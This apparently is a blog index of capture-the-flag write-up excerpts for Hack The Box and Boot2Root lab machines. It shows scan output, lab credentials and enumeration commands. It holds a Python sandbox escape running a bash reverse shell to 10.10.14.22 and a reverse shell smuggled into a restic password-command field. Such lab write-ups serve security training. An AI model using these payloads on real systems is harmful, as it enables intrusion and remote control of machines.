Write Up

Fluffy sur Hack The Box est une boîte de difficulté facile axée sur l’exploitation de vulnérabilités SMB et Active Directory. Avec des accès limités via un partage SMB, on découvre rapidement un rapport d’audit de sécurité exposant plusieurs CVE critiques. Fluffy Easy Challenge HTB Credentials : j.fleischman / J0elTHEM4n1990! Nous allons tester avec smbclient pour voir les fichiers partagés. Il y a effectivement des fichiers. Le PDF peut nous intéresser, voyons voir ce qu’il contient. ...

Expressway Just one port open (SSH) with TCP scan. Testing with UDP scan and find port 500 open, it’s isakmp (Internet Security Association and Key Management Protocol) port for VPN. ISAKMP is a protocol for establishing security association and cryptographic keys in an Internet environment. https://en.wikipedia.org/wiki/Internet_Security_Association_and_Key_Management_Protocol I find blog on hacktricks for exploit ISAKMP. https://book.hacktricks.wiki/en/network-services-pentesting/ipsec-ike-vpn-pentesting.html sudo ike-scan -M 10.129.7.80 sudo python3 iker.py 10.129.7.80 sudo ike-scan -M --showbackoff 10.129.7.80 sudo ike-scan -P -M -A -n fakeID 10.129.7.80 ...

Code Nmap scan https://book.hacktricks.wiki/en/generic-methodologies-and-resources/python/bypass-python-sandboxes/index.html Import does not work. Loop to search for a specific class when you want to obtain it dynamically. for i, cls in enumerate(() .__class__.__bases__[0].__subclasses__()): print(i, cls.__name__) It retrieves the 318th class from the object.__subclasses__() list. It instantiates this class by passing it a shell command that opens a reverse shell to 10.10.14.22:4444 as an argument. ().__class__.__bases__[0].__subclasses__()[317]("bash -c 'bash -i >& /dev/tcp/10.10.14.22/4444 0>&1'", shell=True) ...

Boot2Root est une machine virtuelle. Le but est d’obtenir un accès root en trouvant deux failles différentes. Le challenge combine plusieurs vecteurs d’attaque, notamment du reverse engineering, des failles web comme des injections SQL, ainsi que la possibilité d’exploiter un upload de fichier PHP pour obtenir une exécution de code à distance. Boot2root Scan Nmap Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-13 09:31 UTC Nmap scan report for 192.168.56.101 Host is up (0.00028s latency). Not shown: 994 closed tcp ports (reset) PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.0.8 or later |_ftp-anon: got code 500 "OOPS: vsftpd: refusing to run with writable root inside chroot()". 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.7 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 07:bf:02:20:f0:8a:c8:48:1e:fc:41:ae:a4:46:fa:25 (DSA) | 2048 26:dd:80:a3:df:c4:4b:53:1e:53:42:46:ef:6e:30:b2 (RSA) |_ 256 cf:c3:8c:31:d7:47:7c:84:e2:d2:16:31:b2:8e:63:a7 (ECDSA) 80/tcp open http Apache httpd 2.2.22 ((Ubuntu)) |_http-title: Hack me if you can |_http-server-header: Apache/2.2.22 (Ubuntu) 143/tcp open imap Dovecot imapd |_imap-capabilities: more capabilities IDLE IMAP4rev1 STARTTLS LOGINDISABLEDA0001 have post-login listed OK SASL-IR LOGIN-REFERRALS LITERAL+ ID Pre-login ENABLE |_ssl-date: 2025-02-13T09:32:31+00:00; -1s from scanner time. 443/tcp open ssl/http Apache httpd 2.2.22 |_ssl-date: 2025-02-13T09:32:31+00:00; -1s from scanner time. | ssl-cert: Subject: commonName=BornToSec | Not valid before: 2015-10-08T00:19:46 |_Not valid after: 2025-10-05T00:19:46 |_http-server-header: Apache/2.2.22 (Ubuntu) |_http-title: 404 Not Found 993/tcp open ssl/imaps? |_ssl-date: 2025-02-13T09:32:31+00:00; -1s from scanner time. | ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server | Not valid before: 2015-10-08T20:57:30 |_Not valid after: 2025-10-07T20:57:30 No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.95%E=4%D=2/13%OT=21%CT=1%CU=38008%PV=Y%DS=2%DC=T%G=Y%TM=67ADBC3 OS:0%P=x86_64-unknown-linux-gnu)SEQ(SP=11%GCD=FA00%ISR=9C%TI=I%CI=I%TS=U)OP OS:S(O1=MFFC8%O2=MFFC8%O3=MFFC8%O4=MFFC8%O5=MFFC8%O6=MFFC8)WIN(W1=FFFF%W2=F OS:FFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FFFF)ECN(R=Y%DF=N%T=40%W=FFFF%O=MFFC8%CC= OS:N%Q=)T1(R=Y%DF=N%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=N%T= OS:FF%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=N%T=40%W=FFFF%S=Z%A=S+%F=AR%O=%R OS:D=0%Q=)T6(R=Y%DF=N%T=FF%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T= OS:FF%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=N) Scan Dirbuster Dir found: /cgi-bin/ - 403 Dir found: /forum/ - 200 Dir found: /icons/ - 403 Dir found: /phpmyadmin/ - 200 File found: /forum/index.php - 200 Dir found: /forum/themes/ - 200 Dir found: /forum/themes/default/ - 200 Dir found: /forum/themes/default/images/ - 200 Dir found: /forum/js/ - 200 File found: /forum/js/main.min.js - 200 File found: /phpmyadmin/url.php - 200 File found: /phpmyadmin/Documentation.html - 200 Dir found: /webmail/ - 302 Forum Index ...

Artificial https://mastersplinter.work/research/tensorflow-rce/ python3 -c 'import pty; pty.spawn("/bin/bash")' ssh -L 9898:localhost:9898 gael@10.129.70.219 J’ai tester une autre facon avec les cron etc mais rien ne fonctionne et jai fini par trouver cela. This password that encrypts data in your repository. Recommended to pick a value that is 128 bits of entropy (20 chars or longer) You may alternatively provide env variable credentials e.g. RESTIC_PASSWORD, RESTIC_PASSWORD_FILE, or RESTIC_PASSWORD_COMMAND. Click [Generate] to seed a random password from your browser's crypto random API. RESTIC_PASSWORD_COMMAND=bash -c "/bin/bash -i >& /dev/tcp/10.10.15.36/9999 0>&1" ...

Soulmate I testing ffuf for enumerate subdomain with: ffuf -w ~/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.soulmate.htb" -u http://soulmate.htb -fs 154 I use -fs 154 because size of the error page is 154 and -fs ignore this. I find ftp sudomain for soulmate.htb. I find CVE or bypass authentication: https://github.com/issamjr/CVE-2025-54309-EXPLOIT Exploit give error https connection refused. So i modify the exploit code, I replace https per http. I tested CVE-2025-54309, but I couldn’t get it to work. I later saw that the version of crushFTP was not vulnerable to it. ...